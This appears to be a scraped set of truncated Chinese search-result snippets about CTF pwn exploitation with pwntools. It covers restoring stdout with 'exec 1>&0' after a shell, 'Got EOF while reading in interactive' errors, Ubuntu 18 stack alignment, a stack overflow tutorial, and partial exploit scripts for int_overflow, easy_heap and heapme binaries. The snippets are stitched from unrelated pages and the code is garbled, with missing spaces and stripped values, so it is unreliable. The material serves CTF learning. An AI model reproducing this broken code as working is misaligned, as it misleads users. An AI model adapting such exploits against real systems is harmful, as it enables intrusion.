在getshell后,别忘了用文件重定向exec 1>&0,因为在main函数里close(1)和clsoe(2)关闭了标准输出流和错误输出流,相当于你什么也看不到了,需要重定向标准输出 还有,在本地打是没办法打通的,根据官方wp的说法,pwntools在发现交互的程序标准输出和标准错误输出之后会报[*] Got EOF while reading in interactive,...
[*] Got EOFwhilereadingininteractive $ [*] Process'./int_overflow'stopped with exit code -11(SIGSEGV) (pid182) [*] Got EOFwhilesendingininteractive 先把POC贴出来:这是在我kali本机测试的代码 from pwnimport*#io = remote("", 57052)io = process("./int_overflow") cat_flag_...
[*] Got EOF while reading in interactive$ whoami[DEBUG] Sent 0x7 bytes: 'whoami\n'[*] Got EOF while sending in interactiveroot@kali:~/test/4_pwn# 2017-11-7 16:06 0 poyoten 22 14 楼 elike 请教使用你的exp,whaomi后直接退出,系统需要设置吗? [*] Switching to interactive mode [...
└─$ python exp.py[+]Opening connection to node4.buuoj.cn on port29370:Done[*]Switching to interactive modetimeout:the monitored command dumped core[*]GotEOFwhilereadingininteractive 经BUU 靶机提示可知程序运行于Ubuntu18 环境中,而在该环境中的 64 位程序中调用 printf()、system() 等函数时需严...
栈溢出问题利用依赖pwn及pwntools,这个工具是python库,我们需要安装python环境用于后续栈溢出漏洞测试脚本的编写。 我的电脑装的是python3.6.5,安装方法自行百度,安装成功后,添加环境变量,然后执行命令python查看是否安装成功: 有两种方法: 1、查看python版本:
pwn*pwnlibcontext.update(arch =, os =)(): prefix =postfix =total = prefix + payload + postfix p.sendline(total) p.recvuntil(prefix) data = p.recvuntil(postfix)data[:-]():address = base + (index *) + offset lower_address = address &payload =+(lower_address).encode() +p.sendline...
[*] Got EOF while reading in interactive $ [*] Process './stack_example' stopped with exit code -11 (SIGSEGV) (pid 61936) [*] Got EOF while sending in interactive ``` 可以看到我们确实已经执行success函数。 ### 小总结 上面的示例其实也展示了栈溢出中比较重要的几个步骤: ### 寻找危险...
from pwn import * local = True if local: p = process('./easy_heap') env={'LD_PRELOAD': './libc64.so'})# aggressive alias r = lambda x: p.recv(x) ru = lambda x: p.recvuntil(x) rud = lambda x: p.recvuntil(x, drop=True) ...
/usr/bin/env python2frompwnimport*###iflen(sys.argv) >1: DEBUG =Falselibc = ELF('libc-2.23.so')else: DEBUG =Truelibc = ELF('libc-2.23.so') b = ELF('heapme') context.log_level ='info'context.arch ='amd64'###ifDEBUG: r = process('./heapme', aslr=True, env={'LD_...